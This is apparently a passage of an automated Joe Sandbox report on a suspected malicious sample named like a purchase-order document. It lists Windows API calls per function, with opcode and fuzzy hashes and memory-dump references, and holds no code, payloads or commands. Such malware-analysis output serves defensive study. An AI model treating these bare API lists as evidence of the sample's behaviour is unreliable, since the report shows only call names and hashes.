                                                                                    • Instruction Fuzzy Hash: B0219A75E41209FFDF00DFA4C945BEEB7B8EF46354F088859E445AB241E770AA45CBA0
                                                                                    APIs
                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 001D280A
                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 001D2824
                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 001D2832
                                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 001D2840
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Long$AttributesLayered
                                                                                    • String ID:
                                                                                    • API String ID: 2169480361-0
                                                                                    • Opcode ID: 949ea264268bd0d391463c80106561ec5dee5f0a6627672b52cd146a084868b7
                                                                                    • Instruction ID: d3425d8cffbc1f823f49516f34f0a7029d180c42adf815a2eb072248c6c1f39d
                                                                                    • Opcode Fuzzy Hash: 949ea264268bd0d391463c80106561ec5dee5f0a6627672b52cd146a084868b7
                                                                                    • Instruction Fuzzy Hash: 2421D331309111AFD7149B24D884FAA7B95EF65324F14825AF42A8B7E2C771FC82C7D0
                                                                                    APIs
                                                                                      • Part of subcall function 001A8D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,001A790A,?,000000FF,?,001A8754,00000000,?,0000001C,?,?), ref: 001A8D8C
                                                                                      • Part of subcall function 001A8D7D: lstrcpyW.KERNEL32(00000000,?,?,001A790A,?,000000FF,?,001A8754,00000000,?,0000001C,?,?,00000000), ref: 001A8DB2
                                                                                      • Part of subcall function 001A8D7D: lstrcmpiW.KERNEL32(00000000,?,001A790A,?,000000FF,?,001A8754,00000000,?,0000001C,?,?), ref: 001A8DE3
                                                                                    • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,001A8754,00000000,?,0000001C,?,?,00000000), ref: 001A7923
                                                                                    • lstrcpyW.KERNEL32(00000000,?,?,001A8754,00000000,?,0000001C,?,?,00000000), ref: 001A7949
                                                                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,001A8754,00000000,?,0000001C,?,?,00000000), ref: 001A7984
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: lstrcmpilstrcpylstrlen
                                                                                    • String ID: cdecl
                                                                                    • API String ID: 4031866154-3896280584
                                                                                    • Opcode ID: 468fa276076cc8c63f78921b634e16c74f288d0ada2ec23d2aee4a8495d32f9d
                                                                                    • Instruction ID: b0f9679e31fbcca8ab186aa5f9bb4ed07c34725ed0639469fe5b70be65eaa835
                                                                                    • Opcode Fuzzy Hash: 468fa276076cc8c63f78921b634e16c74f288d0ada2ec23d2aee4a8495d32f9d
                                                                                    • Instruction Fuzzy Hash: 3111063E201342ABCB156F34CC45D7B77A9FF56364B00402BF802CB2A4EB319911C791
                                                                                    APIs
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 001D7D0B
                                                                                    • SetWindowLongW.USER32(00000000,000000F0,?), ref: 001D7D2A
                                                                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 001D7D42
                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,001BB7AD,00000000), ref: 001D7D6B
                                                                                      • Part of subcall function 00159BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00159BB2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Long
                                                                                    • String ID:
                                                                                    • API String ID: 847901565-0
                                                                                    • Opcode ID: 11900efe9db4b3def96f16945884c72bf2194001b8e3ddd5c61b39aae5923443
                                                                                    • Instruction ID: 1cebeb028cb2d20f904ccd307a7dcc3b6f961b68e805fa6901221500ed3726de
                                                                                    • Opcode Fuzzy Hash: 11900efe9db4b3def96f16945884c72bf2194001b8e3ddd5c61b39aae5923443
                                                                                    • Instruction Fuzzy Hash: 0F11D231215A55AFCF108F68DC04AA63BA6AF45370B118726F936C73F0E7308960CB80
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00001060,?,00000004), ref: 001D56BB
                                                                                    • _wcslen.LIBCMT ref: 001D56CD
                                                                                    • _wcslen.LIBCMT ref: 001D56D8
                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 001D5816
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend_wcslen
                                                                                    • String ID:
                                                                                    • API String ID: 455545452-0
                                                                                    • Opcode ID: 7a67e468f5b02eb0d94a754705ca2e393712d5410bccd5a856be6aedceef4dae
                                                                                    • Instruction ID: 62e257a65f5c3aa068c61cd54e9b63701686403b82bc5f2afe58c233a2e42568
                                                                                    • Opcode Fuzzy Hash: 7a67e468f5b02eb0d94a754705ca2e393712d5410bccd5a856be6aedceef4dae
                                                                                    • Instruction Fuzzy Hash: 1B11D375A0161896DF209F65CC85AEE7BBCEF21764B10852BF915D6281EB70CA84CF60
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e3ac2ae4b3b6b82b3c12aa5f92c335ca59c30ce3024449e8e6014d7d17ddbc3c
                                                                                    • Instruction ID: ba98e09f2e28d49580b72e65bacdf8938a290fd3b300015f2a2be08796380ce2
                                                                                    • Opcode Fuzzy Hash: e3ac2ae4b3b6b82b3c12aa5f92c335ca59c30ce3024449e8e6014d7d17ddbc3c
                                                                                    • Instruction Fuzzy Hash: 7F01DFB220A6167EFA2126BCBCC5F67673CDF513B8F358326F528A21D2DB608C404560
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 001A1A47
                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 001A1A59
                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 001A1A6F
                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 001A1A8A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 3850602802-0
                                                                                    • Opcode ID: 101513a081d6ebab7764af8ea91754c1ce3ac3731eca1699b0581c54db4255cf
                                                                                    • Instruction ID: 72a9af8f8fb1db717b0be27f620b0b4ae2b77884714e4b8448a25d522c4e2409
                                                                                    • Opcode Fuzzy Hash: 101513a081d6ebab7764af8ea91754c1ce3ac3731eca1699b0581c54db4255cf
                                                                                    • Instruction Fuzzy Hash: CE113C3AD01219FFEB10DBA4CD85FADBB79EB04750F200091E600B7290D7716E50DB94
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 001AE1FD
                                                                                    • MessageBoxW.USER32(?,?,?,?), ref: 001AE230
                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 001AE246
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 001AE24D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                    • String ID:
                                                                                    • API String ID: 2880819207-0
                                                                                    • Opcode ID: d91e48f40ee49e88dbabf040b5bd7ec8589e9ae2d831e784cf3e43479b0db210
                                                                                    • Instruction ID: 077a847b03c5dbc1467d8c7bf20598f3feb7611fb6913fc166ad25d6db3f0e53
                                                                                    • Opcode Fuzzy Hash: d91e48f40ee49e88dbabf040b5bd7ec8589e9ae2d831e784cf3e43479b0db210
                                                                                    • Instruction Fuzzy Hash: 48110876905259BBC7019FA8AC09BDE7FACEB46310F008656F925D3294D7708900C7A0
                                                                                    APIs
                                                                                    • CreateThread.KERNEL32(00000000,?,0016CFF9,00000000,00000004,00000000), ref: 0016D218
                                                                                    • GetLastError.KERNEL32 ref: 0016D224
                                                                                    • __dosmaperr.LIBCMT ref: 0016D22B
                                                                                    • ResumeThread.KERNEL32(00000000), ref: 0016D249
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                    • String ID:
                                                                                    • API String ID: 173952441-0
                                                                                    • Opcode ID: 34223a482e1388c2a064256b58349c974abcb1166992c9a4ccc6d1736af324d6
                                                                                    • Instruction ID: 21cb7982f37cc88a7c2411b7896db8132233e347fafd999b75ea5992bd0df2ff
                                                                                    • Opcode Fuzzy Hash: 34223a482e1388c2a064256b58349c974abcb1166992c9a4ccc6d1736af324d6
                                                                                    • Instruction Fuzzy Hash: 4D01F536E06205BBCB115BA9EC09BAF7B69EF92330F11421DF925921D0CF71C961C6E0
                                                                                    APIs
                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0014604C
                                                                                    • GetStockObject.GDI32(00000011), ref: 00146060
                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 0014606A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateMessageObjectSendStockWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3970641297-0
                                                                                    • Opcode ID: 2750fbe99486142f832b1a47af18c1e6f0f3e3a547ccec292ebd17dad5c640e8
                                                                                    • Instruction ID: 7cad1087c4379e5f857ffa487a2a79b1fac1f05d4f21aa3206c8b460decf9cb2
                                                                                    • Opcode Fuzzy Hash: 2750fbe99486142f832b1a47af18c1e6f0f3e3a547ccec292ebd17dad5c640e8
                                                                                    • Instruction Fuzzy Hash: F3116172502509BFEF125F94DC44EEABB69EF19359F040216FA1452120D736DCA0DB91
                                                                                    APIs
                                                                                    • ___BuildCatchObject.LIBVCRUNTIME ref: 00163B56
                                                                                      • Part of subcall function 00163AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00163AD2
                                                                                      • Part of subcall function 00163AA3: ___AdjustPointer.LIBCMT ref: 00163AED
                                                                                    • _UnwindNestedFrames.LIBCMT ref: 00163B6B
                                                                                    • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00163B7C
                                                                                    • CallCatchBlock.LIBVCRUNTIME ref: 00163BA4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                    • String ID:
                                                                                    • API String ID: 737400349-0
                                                                                    • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                    • Instruction ID: fd5582462925d18449fa0a7daaa8daf82291ba45aaa651b3f4888fe70ac4298f
                                                                                    • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                    • Instruction Fuzzy Hash: EF010832100149BBDF126E95CC46EEB7F6EEFA9754F044018FE58A6121C732E971EBA0
                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,001413C6,00000000,00000000,?,0017301A,001413C6,00000000,00000000,00000000,?,0017328B,00000006,FlsSetValue), ref: 001730A5
                                                                                    • GetLastError.KERNEL32(?,0017301A,001413C6,00000000,00000000,00000000,?,0017328B,00000006,FlsSetValue,001E2290,FlsSetValue,00000000,00000364,?,00172E46), ref: 001730B1
                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0017301A,001413C6,00000000,00000000,00000000,?,0017328B,00000006,FlsSetValue,001E2290,FlsSetValue,00000000), ref: 001730BF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 3177248105-0
                                                                                    • Opcode ID: 4b22338b428c2f52aa2fe402a82fb1afbddfd39a22fb8cb037f13b248c2ac7e0
                                                                                    • Instruction ID: da732492a210482fc94ce615119fa091c00f402b77a3fa111e55bbd8d14fb1b4
                                                                                    • Opcode Fuzzy Hash: 4b22338b428c2f52aa2fe402a82fb1afbddfd39a22fb8cb037f13b248c2ac7e0
                                                                                    • Instruction Fuzzy Hash: 3B012032353333ABCB314B789C4895777A8AF05761B118720F92DD7140DB21D981D6E0
                                                                                    APIs
                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 001A747F
                                                                                    • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 001A7497
                                                                                    • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 001A74AC
                                                                                    • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 001A74CA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Type$Register$FileLoadModuleNameUser
                                                                                    • String ID:
                                                                                    • API String ID: 1352324309-0
                                                                                    • Opcode ID: 58a4140ec6c088bfb7660f6d16dbb1320d5978e8fb013305239cb622cb75cc91
                                                                                    • Instruction ID: d1af6292444f21981fc726b26f53bf7ed9ec2b12b1119876212313db93c82275
                                                                                    • Opcode Fuzzy Hash: 58a4140ec6c088bfb7660f6d16dbb1320d5978e8fb013305239cb622cb75cc91
                                                                                    • Instruction Fuzzy Hash: 9F11C4B920A3119FE7208F14DC08FD27FFCEB05B00F10896AA616D6591D770EA44DB90
                                                                                    APIs
                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,001AACD3,?,00008000), ref: 001AB0C4
                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,001AACD3,?,00008000), ref: 001AB0E9
                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,001AACD3,?,00008000), ref: 001AB0F3
                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,001AACD3,?,00008000), ref: 001AB126
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: CounterPerformanceQuerySleep
                                                                                    • String ID:
                                                                                    • API String ID: 2875609808-0
                                                                                    • Opcode ID: 8cc6f8a32ea1a7fde43f4d03b134c46c0efc883e69eae6f685cd22b98708fb6c
                                                                                    • Instruction ID: 66d34676667986ddb3db1a4b3756674a44254dcb2f60ab69306639a72d3fb8f9
                                                                                    • Opcode Fuzzy Hash: 8cc6f8a32ea1a7fde43f4d03b134c46c0efc883e69eae6f685cd22b98708fb6c
                                                                                    • Instruction Fuzzy Hash: 2F116D75C0666DE7CF04AFE4E9A86EEBF78FF0A711F114496E941B2182CB305650CB91
                                                                                    APIs
                                                                                    • GetWindowRect.USER32(?,?), ref: 001D7E33
                                                                                    • ScreenToClient.USER32(?,?), ref: 001D7E4B
                                                                                    • ScreenToClient.USER32(?,?), ref: 001D7E6F
                                                                                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 001D7E8A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                                                    • String ID:
                                                                                    • API String ID: 357397906-0
                                                                                    • Opcode ID: 89496995c04a76450006dec6781b54150f6ea08c8bad9f7beb64e212d26324dd
                                                                                    • Instruction ID: e0029f3608a2b307712ad0b5df288ab7d06da03f4b99d04a0cce21c0928bc5ee
                                                                                    • Opcode Fuzzy Hash: 89496995c04a76450006dec6781b54150f6ea08c8bad9f7beb64e212d26324dd
                                                                                    • Instruction Fuzzy Hash: C11143B9D0124AAFDB41CF98C884AEEBBF5FB18310F505156E915E2610D735AA94CF90
                                                                                    APIs
                                                                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 001A2DC5
                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 001A2DD6
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 001A2DDD
                                                                                    • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 001A2DE4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2710830443-0
                                                                                    • Opcode ID: af17a1000fa4928e070a51ebfaec0bfcda257eba46847e18728ab2110589c627
                                                                                    • Instruction ID: 70b927f17055e72d22d9d6b5e67bbde3eeafa786b2bfa4ae85d5fcf61f57a055
                                                                                    • Opcode Fuzzy Hash: af17a1000fa4928e070a51ebfaec0bfcda257eba46847e18728ab2110589c627
                                                                                    • Instruction Fuzzy Hash: ADE06D71103225BADB201BA69C0DEEB3F6CEF43BA1F000416F505D15819AA4C880C6F0
                                                                                    APIs
                                                                                      • Part of subcall function 00159639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00159693
                                                                                      • Part of subcall function 00159639: SelectObject.GDI32(?,00000000), ref: 001596A2
                                                                                      • Part of subcall function 00159639: BeginPath.GDI32(?), ref: 001596B9
                                                                                      • Part of subcall function 00159639: SelectObject.GDI32(?,00000000), ref: 001596E2
                                                                                    • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 001D8887
                                                                                    • LineTo.GDI32(?,?,?), ref: 001D8894
                                                                                    • EndPath.GDI32(?), ref: 001D88A4
                                                                                    • StrokePath.GDI32(?), ref: 001D88B2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
